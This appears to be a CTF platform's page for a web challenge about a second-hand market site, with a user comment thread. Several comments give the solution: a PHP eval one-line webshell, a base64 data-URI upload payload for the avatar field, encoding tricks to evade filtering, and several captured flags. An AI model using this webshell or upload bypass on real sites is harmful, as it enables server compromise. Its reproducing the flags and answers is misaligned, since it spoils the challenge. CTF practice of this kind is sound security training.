xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2367
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
不会编程的崽 1年前

我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。

回复 0
lzq2000 10天前

大家都知道base64编码是按顺序每三个字符一组进行编码,正常情况下对“;?>”进行base64编码得到的就是“Oz8+”,我们可以调整“;”前面的字符长度,让“;”不与“?>”分在一组编码即可!另外我估计把加号进行url编码应该也可以,我没测试。

回复 0

lzq2000 10天前

结尾不能为“+”,因为“+”会被认为是空格,不参与base64解码,所以解码后会少个大于号“>”,运行这个php时会报错!!!你这个马POST['a']在base64编码后会出现“+”,而POST['attack']不会出现加号!

回复 0

三碗不过杠 1年前

flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base

回复 1

冯飞99 2年前

这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}

回复 1

wxy1343 2年前

flag{412d5e0844a33f36c9aa3d688425fb9f}

回复 0

ctfliu 2年前

image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag

回复 0

五无心惘然 2年前

别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了

回复 0

OOwoofOO 2年前

为什么我连上传木马都失败了啊?!我已经改了php并且用了base64编码,好无语。。。

回复 0

Vio1et 2年前

<?php eval($_POST['asdf']);?> 蹲一个大佬来解释一下为什么这个东西base64后上传用浏览器访问却不能执行。。

回复 2

songyue 2年前

上传头像就卡死,怎么玩

回复 0

1317554973 2年前

为什么我用POST就失败了 用REQUEST就能成功 有大佬的话踩我

回复 0

WriteUp

image
nic016

5 金币

评分(10)

解题动态

a1451753998 攻破了该题 1天前
zhuizhui 攻破了该题 2天前
dwx1583 攻破了该题 3天前
hackerbugku 攻破了该题 3天前
qidianzhi 攻破了该题 4天前
Future92 攻破了该题 7天前
lzq2000 攻破了该题 10天前
网络安全亮 攻破了该题 11天前
ETERNALBLUE 攻破了该题 13天前
李欣 攻破了该题 14天前
nihaolmb 攻破了该题 16天前
yafoolaw 攻破了该题 16天前
124要留就要77 攻破了该题 18天前
18039739141 攻破了该题 18天前
ZZZZZZYx 攻破了该题 19天前
奔跑小马 攻破了该题 19天前
puppyo0o0 攻破了该题 20天前
souljian03 攻破了该题 21天前
wpc1027 攻破了该题 22天前
The-Beacon 攻破了该题 26天前
问题反馈